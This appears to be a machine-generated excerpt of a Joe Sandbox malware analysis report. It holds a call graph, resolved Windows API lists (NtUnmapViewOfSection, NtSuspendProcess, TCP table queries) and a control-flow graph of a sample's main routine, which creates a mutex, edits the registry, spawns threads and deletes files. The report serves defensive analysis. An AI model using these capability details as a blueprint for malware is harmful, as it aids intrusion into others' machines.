401e65 22 API calls 47240->47613 47612 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47241->47612 47242 40ec47 47608 407260 97 API calls 47242->47608 47244 40f37f 47691 413a23 RegOpenKeyExW RegDeleteValueW 47244->47691 47248 40ec99 47614 41bc5e 28 API calls 47248->47614 47249 40ec55 47249->47227 47254 40ec71 47249->47254 47252 40eca4 47615 401f13 28 API calls 47252->47615 47610 407260 97 API calls 47254->47610 47255 40f392 47692 401f09 11 API calls 47255->47692 47256 40ecaf 47616 401f09 11 API calls 47256->47616 47260 40f39c 47693 401f09 11 API calls 47260->47693 47261 40ecb8 47617 401e65 22 API calls 47261->47617 47264 40f3a5 47694 40dd42 27 API calls 47264->47694 47265 40ecc1 47618 401e65 22 API calls 47265->47618 47267 40f3aa 47695 414f2a 167 API calls _strftime 47267->47695 47271 40ecdb 47619 401e65 22 API calls 47271->47619 47273 40ecf5 47620 401e65 22 API calls 47273->47620 47275 40ed80 47278 40ed8a 47275->47278 47284 40ef06 ___scrt_fastfail 47275->47284 47276 40ed0e 47276->47275 47621 401e65 22 API calls 47276->47621 47279 40ed93 47278->47279 47286 40ee0f 47278->47286 47627 401e65 22 API calls 47279->47627 47281 40ed9c 47628 401e65 22 API calls 47281->47628 47282 40ed23 _wcslen 47282->47275 47622 401e65 22 API calls 47282->47622 47638 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47284->47638 47285 40edae 47629 401e65 22 API calls 47285->47629 47309 40ee0a ___scrt_fastfail 47286->47309 47288 40ed3e 47623 401e65 22 API calls 47288->47623 47292 40edc0 47630 401e65 22 API calls 47292->47630 47293 40ed53 47624 40da34 31 API calls 47293->47624 47294 40ef51 47639 401e65 22 API calls 47294->47639 47298 40ede9 47631 401e65 22 API calls 47298->47631 47299 40ef76 47640 402093 28 API calls 47299->47640 47300 40ed66 47625 401f13 28 API calls 47300->47625 47303 40ed72 47626 401f09 11 API calls 47303->47626 47305 40ef88 47641 41376f 14 API calls 47305->47641 47307 40edfa 47632 40cdf9 45 API calls _wcslen 47307->47632 47308 40ed7b 47308->47275 47309->47286 47633 413947 31 API calls 47309->47633 47313 40ef9e 47642 401e65 22 API calls 47313->47642 47314 40eea3 ctype 47634 401e65 22 API calls 47314->47634 47316 40efaa 47643 43baac 39 API calls _strftime 47316->47643 47319 40efb7 47321 40efe4 47319->47321 47644 41cd9b 86 API calls ___scrt_fastfail 47319->47644 47320 40eeba 47320->47294 47635 401e65 22 API calls 47320->47635 47645 402093 28 API calls 47321->47645 47323 40eed7 47636 41bc5e 28 API calls 47323->47636 47325 40efc8 CreateThread 47325->47321 47806 41d45d 10 API calls 47325->47806 47328 40eff9 47646 402093 28 API calls 47328->47646 47329 40eee3 47637 40f474 103 API calls 47329->47637 47332 40f008 47647 41b4ef 79 API calls 47332->47647 47333 40eee8 47333->47294 47335 40eeef 47333->47335 47335->47219 47336 40f00d 47648 401e65 22 API calls 47336->47648 47338 40f019 47649 401e65 22 API calls 47338->47649 47340 40f02b 47650 401e65 22 API calls 47340->47650 47342 40f04b 47651 43baac 39 API calls _strftime 47342->47651 47344 40f058 47652 401e65 22 API calls 47344->47652 47346 40f063 47653 401e65 22 API calls 47346->47653 47348 40f074 47654 401e65 22 API calls 47348->47654 47350 40f089 47655 401e65 22 API calls 47350->47655 47352 40f09a 47353 40f0a1 StrToIntA 47352->47353 47656 409de4 169 API calls _wcslen 47353->47656 47355 40f0b3 47657 401e65 22 API calls 47355->47657 47357 40f101 47666 401e65 22 API calls 47357->47666 47358 40f0bc 47358->47357 47658 4344ea 47358->47658 47363 40f0e4 47364 40f0eb CreateThread 47363->47364 47364->47357 47801 419fb4 102 API calls 2 library calls 47364->47801 47365 40f159 47668 401e65 22 API calls 47365->47668 47366 40f111 47366->47365 47368 4344ea new 22 API calls 47366->47368 47369 40f126 47368->47369 47667 401e65 22 API calls 47369->47667 47371 40f138 47374 40f13f CreateThread 47371->47374 47372 40f1cc 47674 401e65 22 API calls 47372->47674 47373 40f162 47373->47372 47669 401e65 22 API calls 47373->47669 47374->47365 47807 419fb4 102 API calls 2 library calls 47374->47807 47377 40f17e 47670 401e65 22 API calls 47377->47670 47378 40f1d5 47379 40f21a 47378->47379 47675 401e65 22 API calls 47378->47675 47679 41b60d 79 API calls 47379->47679 47383 40f193 47671 40d9e8 31 API calls 47383->47671 47384 40f223 47680 401f13 28 API calls 47384->47680 47385 40f1ea 47676 401e65 22 API calls 47385->47676 47388 40f22e 47681 401f09 11 API calls 47388->47681 47390 40f1a6 47672 401f13 28 API calls 47390->47672 47392 40f1ff 47677 43baac 39 API calls _strftime 47392->47677 47394 40f237 CreateThread 47397 40f264 47394->47397 47398 40f258 CreateThread 47394->47398 47802 40f7a7 120 API calls 47394->47802 47395 40f1b2 47673 401f09 11 API calls 47395->47673 47400 40f279 47397->47400 47401 40f26d CreateThread 47397->47401 47398->47397 47803 4120f7 137 API calls 47398->47803 47405 40f2cc 47400->47405 47682 402093 28 API calls 47400->47682 47401->47400 47804 4126db 38 API calls ___scrt_fastfail 47401->47804 47403 40f1bb CreateThread 47403->47372 47805 401be9 49 API calls _strftime 47403->47805 47404 40f20c 47678 40c162 7 API calls 47404->47678 47684 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47405->47684 47408 40f29c 47683 4052fd 28 API calls 47408->47683 47411 40f2e4 47411->47264 47685 41bc5e 28 API calls 47411->47685 47417 40f2fd 47686 41361b 31 API calls 47417->47686 47421 40f313 47687 401f09 11 API calls 47421->47687 47423 40f346 DeleteFileW 47424 40f34d 47423->47424 47425 40f31e 47423->47425 47690 41bc5e 28 API calls 47424->47690 47425->47423 47425->47424 47426 40f334 Sleep 47425->47426 47426->47425 47428 434984 47427->47428 47428->47132 47429 44341f 47428->47429 47809 44319c 47429->47809 47432->47114 47433->47118 47434->47124 47435->47121 47436->47134 47437->47120 47438->47140 47439->47142 47444 44fb68 47440->47444 47443 438f5a 8 API calls 3 library calls 47443->47143 47447 44fb85 47444->47447 47448 44fb81 47444->47448 47446 4345bd 47446->47146 47446->47443 47447->47448 47450 449ca6 47447->47450 47462 434fcb 47448->47462 47451 449cb2 ___scrt_is_nonwritable_in_current_image 47450->47451 47469 445888 EnterCriticalSection 47451->47469 47453 449cb9 47470 450183 47453->47470 47455 449cc8 47461 449cd7 47455->47461 47481 449b3a 23 API calls 47455->47481 47458 449cd2 47482 449bf0 GetStdHandle GetFileType 47458->47482 47460 449ce8 ___scrt_is_nonwritable_in_current_image 47460->47447 47483 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47461->47483 47463 434fd6 IsProcessorFeaturePresent 47462->47463 47464 434fd4 47462->47464 47466 435018 47463->47466 47464->47446 47505 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47466->47505 47468 4350fb 47468->47446 47469->47453 47471 45018f ___scrt_is_nonwritable_in_current_image 47470->47471 47472 4501b3 47471->47472 47473 45019c 47471->47473 47484 445888 EnterCriticalSection 47472->47484 47492 4405dd 20 API calls _free 47473->47492 47476 4501bf 47480 4501eb 47476->47480 47485 4500d4 47476->47485 47478 4501a1 ___scrt_is_nonwritable_in_current_image ___std_exception_copy 47478->47455 47493 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47480->47493 47481->47458 47482->47461 47483->47460 47484->47476 47494 445af3 47485->47494 47487 4500f3 47502 446782 20 API calls _free 47487->47502 47490 450145 47490->47476 47491 4500e6 47491->47487 47501 448a84 11 API calls 2 library calls 47491->47501 47492->47478 47493->47478 47499 445b00 __Getctype 47494->47499 47495 445b40 47504 4405dd 20 API calls _free 47495->47504 47496 445b2b RtlAllocateHeap 47497 445b3e 47496->47497 47496->47499 47497->47491 47499->47495 47499->47496 47503 442f80 7 API calls 2 library calls 47499->47503 47501->47491 47502->47490 47503->47499 47504->47497 47505->47468 47507 434b27 GetStartupInfoW 47506->47507 47507->47151 47509 44f06b 47508->47509 47510 44f062 47508->47510 47509->47154 47513 44ef58 48 API calls 4 library calls 47510->47513 47512->47154 47513->47509 47515 41cb8f LoadLibraryA GetProcAddress 47514->47515 47516 41cb7f GetModuleHandleA GetProcAddress 47514->47516 47517 41cbb8 44 API calls 47515->47517 47518 41cba8 LoadLibraryA GetProcAddress 47515->47518 47516->47515 47517->47159 47518->47517 47696 41b4a8 FindResourceA 47519->47696 47523 40f3ed _Yarn 47706 4020b7 47523->47706 47526 401fe2 28 API calls 47527 40f413 47526->47527 47528 401fd8 11 API calls 47527->47528 47529 40f41c 47528->47529 47530 43bd51 new 21 API calls 47529->47530 47531 40f42d _Yarn 47530->47531 47712 406dd8 47531->47712 47533 40f460 47533->47161 47535 40210c 47534->47535 47536 4023ce 11 API calls 47535->47536 47537 402126 47536->47537 47538 402569 28 API calls 47537->47538 47539 402134 47538->47539 47539->47164 47749 4020df 47540->47749 47542 401fd8 11 API calls 47543 41bed0 47542->47543 47545 401fd8 11 API calls 47543->47545 47544 41bea0 47765 4041a2 28 API calls 47544->47765 47548 41bed8 47545->47548 47550 401fd8 11 API calls 47548->47550 47549 41beac 47551 401fe2 28 API calls 47549->47551 47553 40ea24 47550->47553 47554 41beb5 47551->47554 47552 401fe2 28 API calls 47558 41be2e 47552->47558 47562 40fb17 47553->47562 47555 401fd8 11 API calls 47554->47555 47557 41bebd 47555->47557 47556 401fd8 11 API calls 47556->47558 47559 41ce34 28 API calls 47557->47559 47558->47544 47558->47552 47558->47556 47561 41be9e 47558->47561 47753 4041a2 28 API calls 47558->47753 47754 41ce34 47558->47754 47559->47561 47561->47542 47563 40fb23 47562->47563 47565 40fb2a 47562->47565 47791 402163 11 API calls 47563->47791 47565->47169 47567 402163 47566->47567 47568 40219f 47567->47568 47792 402730 11 API calls 47567->47792 47568->47171 47570 402184 47793 402712 11 API calls std::_Deallocate 47570->47793 47572->47177 47573->47181 47574->47184 47575->47188 47577 401ff1 47576->47577 47584 402039 47576->47584 47578 4023ce 11 API calls 47577->47578 47579 401ffa 47578->47579 47580 40203c 47579->47580 47582 402015 47579->47582 47795 40267a 11 API calls 47580->47795 47794 403098 28 API calls 47582->47794 47585 401fd8 47584->47585 47586 4023ce 11 API calls 47585->47586 47587 401fe1 47586->47587 47587->47196 47588->47200 47589->47202 47590->47204 47591->47206 47592->47215 47796 401fab 47593->47796 47595 40d073 CreateMutexA GetLastError 47595->47218 47596->47176 47597->47179 47598->47185 47599->47189 47601->47210 47602->47222 47603->47226 47604->47214 47605->47225 47606->47233 47607->47242 47608->47236 47609->47249 47610->47227 47611->47232 47612->47240 47613->47248 47614->47252 47615->47256 47616->47261 47617->47265 47618->47271 47619->47273 47620->47276 47621->47282 47622->47288 47623->47293 47624->47300 47625->47303 47626->47308 47627->47281 47628->47285 47629->47292 47630->47298 47631->47307 47632->47309 47633->47314 47634->47320 47635->47323 47636->47329 47637->47333 47638->47294 47639->47299 47640->47305 47641->47313 47642->47316 47643->47319 47644->47325 47645->47328 47646->47332 47647->47336 47648->47338 47649->47340 47650->47342 47651->47344 47652->47346 47653->47348 47654->47350 47655->47352 47656->47355 47657->47358 47664 4344ef 47658->47664 47659 43bd51 new 21 API calls 47659->47664 47660 40f0d1 47665 401e65 22 API calls 47660->47665 47664->47659 47664->47660 47797 442f80 7 API calls 2 library calls 47664->47797 47798 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47664->47798 47799 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47664->47799 47665->47363 47666->47366 47667->47371 47668->47373 47669->47377 47670->47383 47671->47390 47672->47395 47673->47403 47674->47378 47675->47385 47676->47392 47677->47404 47678->47379 47679->47384 47680->47388 47681->47394 47682->47408 47684->47411 47685->47417 47686->47421 47687->47425 47688->47234 47690->47244 47691->47255 47692->47260 47693->47264 47694->47267 47800 41ad17 104 API calls 47695->47800 47697 41b4c5 LoadResource LockResource SizeofResource 47696->47697 47698 40f3de 47696->47698 47697->47698 47699 43bd51 47698->47699 47704 446137 __Getctype 47699->47704 47700 446175 47716 4405dd 20 API calls _free 47700->47716 47702 446160 RtlAllocateHeap 47703 446173 47702->47703 47702->47704 47703->47523 47704->47700 47704->47702 47715 442f80 7 API calls 2 library calls 47704->47715 47707 4020bf 47706->47707 47717 4023ce 47707->47717 47709 4020ca 47721 40250a 47709->47721 47711 4020d9 47711->47526 47713 4020b7 28 API calls 47712->47713 47714 406dec 47713->47714 47714->47533 47715->47704 47716->47703 47718 402428 47717->47718 47719 4023d8 47717->47719 47718->47709 47719->47718 47728 4027a7 11 API calls std::_Deallocate 47719->47728 47722 40251a 47721->47722 47723 402520 47722->47723 47724 402535 47722->47724 47729 402569 47723->47729 47739 4028e8 28 API calls 47724->47739 47727 402533 47727->47711 47728->47718 47740 402888 47729->47740 47731 40257d 47732 402592 47731->47732 47733 4025a7 47731->47733 47745 402a34 22 API calls 47732->47745 47747 4028e8 28 API calls 47733->47747 47736 40259b 47746 4029da 22 API calls 47736->47746 47738 4025a5 47738->47727 47739->47727 47741 402890 47740->47741 47742 402898 47741->47742 47748 402ca3 22 API calls 47741->47748 47742->47731 47745->47736 47746->47738 47747->47738 47750 4020e7 47749->47750 47751 4023ce 11 API calls 47750->47751 47752 4020f2 47751->47752 47752->47558 47753->47558 47755 41ce41 47754->47755 47756 41cea0 47755->47756 47760 41ce51 47755->47760 47757 41ceba 47756->47757 47758 41cfe0 28 API calls 47756->47758 47775 41d146 28 API calls 47757->47775 47758->47757 47762 41ce89 47760->47762 47766 41cfe0 47760->47766 47774 41d146 28 API calls 47762->47774 47764 41ce9c 47764->47558 47765->47549 47768 41cfe8 47766->47768 47767 41d01a 47767->47762 47768->47767 47769 41d01e 47768->47769 47772 41d002 47768->47772 47786 402725 22 API calls 47769->47786 47776 41d051 47772->47776 47774->47764 47775->47764 47777 41d05b __EH_prolog 47776->47777 47787 402717 22 API calls 47777->47787 47779 41d06e 47788 41d15d 11 API calls 47779->47788 47781 41d094 47782 41d0cc 47781->47782 47789 402730 11 API calls 47781->47789 47782->47767 47784 41d0b3 47790 402712 11 API calls std::_Deallocate 47784->47790 47787->47779 47788->47781 47789->47784 47790->47782 47791->47565 47792->47570 47793->47568 47794->47584 47795->47584 47797->47664 47808 4127ee 61 API calls 47803->47808 47810 4431a8 IsInExceptionSpec 47809->47810 47811 4431c0 47810->47811 47812 4432f6 _Atexit GetModuleHandleW 47810->47812 47831 445888 EnterCriticalSection 47811->47831 47814 4431b4 47812->47814 47814->47811 47843 44333a GetModuleHandleExW 47814->47843 47815 443266 47832 4432a6 47815->47832 47819 44323d 47822 443255 47819->47822 47852 4441f5 5 API calls _ValidateLocalCookies 47819->47852 47820 443283 47835 4432b5 47820->47835 47821 4432af 47854 457729 5 API calls _ValidateLocalCookies 47821->47854 47853 4441f5 5 API calls _ValidateLocalCookies 47822->47853 47823 4431c8 47823->47815 47823->47819 47851 443f50 20 API calls _Atexit 47823->47851 47831->47823 47855 4458d0 LeaveCriticalSection 47832->47855 47834 44327f 47834->47820 47834->47821 47856 448cc9 47835->47856 47838 4432e3 47841 44333a _Atexit 8 API calls 47838->47841 47839 4432c3 GetPEB 47839->47838 47840 4432d3 GetCurrentProcess TerminateProcess 47839->47840 47840->47838 47842 4432eb ExitProcess 47841->47842 47844 443364 GetProcAddress 47843->47844 47845 443387 47843->47845 47846 443379 47844->47846 47847 443396 47845->47847 47848 44338d FreeLibrary 47845->47848 47846->47845 47849 434fcb _ValidateLocalCookies 5 API calls 47847->47849 47848->47847 47850 4433a0 47849->47850 47850->47811 47851->47819 47852->47822 47853->47815 47855->47834 47857 448ce4 47856->47857 47858 448cee 47856->47858 47860 434fcb _ValidateLocalCookies 5 API calls 47857->47860 47862 4484ca 47858->47862 47861 4432bf 47860->47861 47861->47838 47861->47839 47863 4484f6 47862->47863 47864 4484fa 47862->47864 47863->47864 47868 44851a 47863->47868 47869 448566 47863->47869 47864->47857 47866 448526 GetProcAddress 47867 448536 __crt_fast_encode_pointer 47866->47867 47867->47864 47868->47864 47868->47866 47870 448587 LoadLibraryExW 47869->47870 47875 44857c 47869->47875 47871 4485a4 GetLastError 47870->47871 47872 4485bc 47870->47872 47871->47872 47873 4485af LoadLibraryExW 47871->47873 47874 4485d3 FreeLibrary 47872->47874 47872->47875 47873->47872 47874->47875 47875->47863 47876 404e26 WaitForSingleObject 47877 404e40 SetEvent FindCloseChangeNotification 47876->47877 47878 404e57 closesocket 47876->47878 47879 404ed8 47877->47879 47880 404e64 47878->47880 47881 404e7a 47880->47881 47889 4050e4 83 API calls 47880->47889 47883 404e8c WaitForSingleObject 47881->47883 47884 404ece SetEvent CloseHandle 47881->47884 47890 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47883->47890 47884->47879 47886 404e9b SetEvent WaitForSingleObject 47891 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47886->47891 47888 404eb3 SetEvent CloseHandle CloseHandle 47888->47884 47889->47881 47890->47886 47891->47888 47892 40165e 47893 401666 47892->47893 47894 401669 47892->47894 47895 4016a8 47894->47895 47897 401696 47894->47897 47896 4344ea new 22 API calls 47895->47896 47899 40169c 47896->47899 47898 4344ea new 22 API calls 47897->47898 47898->47899

                                    Executed Functions

                                    Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 465 4432b5-4432c1 call 448cc9 468 4432e3-4432ef call 44333a ExitProcess 465->468 469 4432c3-4432d1 GetPEB 465->469 469->468 470 4432d3-4432dd GetCurrentProcess TerminateProcess 469->470 470->468
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03 call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 86 40ec08-40ec0a 80->86 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 89 40ec13-40ec1a 86->89 90 40ec0c-40ec0e 86->90 95 40ec1c 89->95 96 40ec1e-40ec2a call 41b2c3 89->96 94 40eef1 90->94 94->49 95->96 103 40ec33-40ec37 96->103 104 40ec2c-40ec2e 96->104 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39-40ec40 call 407716 103->108 104->103 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->127 128 40ec8b call 407755 107->128 120 40ec42-40ec47 call 407738 call 407260 108->120 121 40ec4c-40ec5f call 401e65 call 401fab 108->121 120->121 121->107 140 40ec61-40ec67 121->140 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 140->107 143 40ec69-40ec6f 140->143 143->107 147 40ec71 call 407260 143->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed39 call 401e65 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 184 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->184 185 40ee0f-40ee19 call 409057 181->185 191 40ee1e-40ee42 call 40247c call 434798 184->191 185->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 214 40ed3e-40ed7b call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 205->214 218 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 212->218 213->218 214->177 218->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 218->286 287 40efc1 236->287 288 40efdc-40efde 236->288 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->94 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 357 40f159-40f16c call 401e65 call 401fab 347->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 